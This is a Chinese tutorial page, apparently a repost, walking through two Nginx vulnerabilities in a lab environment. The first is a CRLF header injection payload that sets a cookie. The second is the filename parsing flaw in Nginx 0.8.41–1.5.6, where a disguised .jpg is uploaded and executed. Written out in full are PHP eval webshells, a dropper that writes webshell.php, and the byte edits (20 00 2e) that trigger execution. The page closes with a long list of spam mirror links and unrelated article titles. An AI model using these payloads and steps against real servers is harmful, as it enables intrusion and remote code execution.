当前位置: 首页 > wzjs >正文

自己开发网站需要什么技术移动端ui

自己开发网站需要什么技术,移动端ui,做内衣模特接广告网站,苏州高新区网站建设一、CRLF注入漏洞 原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞 1、开环境 2、访问网站,并抓包 3、构造请求头 %0ASet-cookie:JSPSESSID%3D1 这样就可以…

一、CRLF注入漏洞

原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞

1、开环境

2、访问网站,并抓包

3、构造请求头

%0ASet-cookie:JSPSESSID%3D1 

这样就可以看到响应头里有我们刚刚添加的cookie了

二、文件名逻辑漏洞

原理:非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6

1、开环境

2、制造木马

在我们本地新建一个1.jpg(因为这里只能上传图片文件)里面写入一句话木马

<?php @eval($_POST[cmd]);?>

3、上传木马,抓包

4、修改数据包

在文件名的最后加个空格,就可以把木马上传进去

5、放行,访问木马

这里看到木马已经上传进去了

(1)直接访问是访问不到的,我们需要在文件名后加...php然后抓包

(2)抓到包之后修改数据包,把2e 2e 2e修改为20 00 2e

(3)放行

修改完成之后放行就可以访问到木马了

6、测试连接

这里发现我们的木马文件虽然传上去了,但是因为我们的木马文件被编码了,所以直接连是连不上的,所以我们需要重新构造木马文件

7、重新构造文件上传

这串代码的意思是:在当前目录生成一个webshell.php文件,里面是一句话木马

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上传2.jpg,抓包,加空格,放行

访问刚刚上传的文件,这一步是为了执行代码

/uploadfiles/2.jpg...php

还是抓包,修改为20 00 2e

执行成功之后去访问我们木马里写的webshell.php文件

8、访问成功,测试连接


文章转载自:

http://6vsZLgxl.fhqnm.cn
http://ab1Ss547.fhqnm.cn
http://FbKoCwtU.fhqnm.cn
http://UNcEmCoA.fhqnm.cn
http://fkQY6s8o.fhqnm.cn
http://kEfoM36C.fhqnm.cn
http://3g5suy3l.fhqnm.cn
http://G7yicFDl.fhqnm.cn
http://xYLmi57v.fhqnm.cn
http://RYLJgKAy.fhqnm.cn
http://Q7SwWPzK.fhqnm.cn
http://WWeieY1n.fhqnm.cn
http://Q1IjhE1C.fhqnm.cn
http://PRJ0lFD2.fhqnm.cn
http://dRQwgePS.fhqnm.cn
http://NTAjRrdK.fhqnm.cn
http://rm9fMWSu.fhqnm.cn
http://ydvxktQw.fhqnm.cn
http://hCwlYUs1.fhqnm.cn
http://muDMGHX7.fhqnm.cn
http://PtlDwCUe.fhqnm.cn
http://BsoPTagZ.fhqnm.cn
http://f4KltBcj.fhqnm.cn
http://wNEpYeUy.fhqnm.cn
http://bxzPpzu9.fhqnm.cn
http://BtYZhxkB.fhqnm.cn
http://sRtiNh06.fhqnm.cn
http://Iw5Dublo.fhqnm.cn
http://SiBsmeYe.fhqnm.cn
http://hhY0jsgQ.fhqnm.cn
http://www.dtcms.com/wzjs/687767.html

相关文章:

  • 定制网站开发流程图南京宜电的网站谁做的
  • 网站的域名每年都要续费wordpress 到小程序
  • wordpress分享视频网站自己做直播网站
  • 合肥比较好的网站制作百度整站优化
  • 企业建立网站的原因北京软件开发公司排行
  • 门户网站开发jz190网站建设p2p
  • 杭州品牌网站建设重庆网站建设及优化公司
  • 舟山建设工程信息网站库存管理软件有哪些
  • 深圳设计网站培训前程无忧企业官方网站
  • 备案的网站每年都要备案么最近高清中文在线国语字幕
  • 会展网站建设网络营销和传统营销的区别和联系
  • 贵阳网站建设管理html静态网站模板下载
  • 入侵WordPress网站怎么制作小程序商城
  • js网站开发教程微信小程序商城收费吗
  • 地方性资讯门户网站怎么去推广自己的网站
  • 专业网站建设制做的网站如何投入搜索引擎
  • 学院网站建设 需求分析wordpress图片批量链接
  • 临沂建设网站公司wordpress 插件 调用
  • 如何做psd的模板下载网站公关公司排行榜
  • 勐海县城乡建设局门户网站成都建设银行官方网站
  • 我们为什么选择做电子商务网站网页制作与网页设计简历
  • 无锡网站建设排名丹东市住房与城乡建设厅网站
  • 商城微网站建设cnc强力磁盘 东莞网站建设
  • 给网站做脚本算违法吗什么网站可以看女人唔易做
  • 微信公众号怎么做微网站网站控制面板地址
  • 中山皇冠建设开发有限公司网站美食网站制作代码
  • 凡科网站制作关键词挖掘工具
  • 西安找建网站公司网页设计app软件
  • 衡水网站开发报价什么网站可以做期刊封面
  • 怎样进入建设通网站wordpress 不显示时间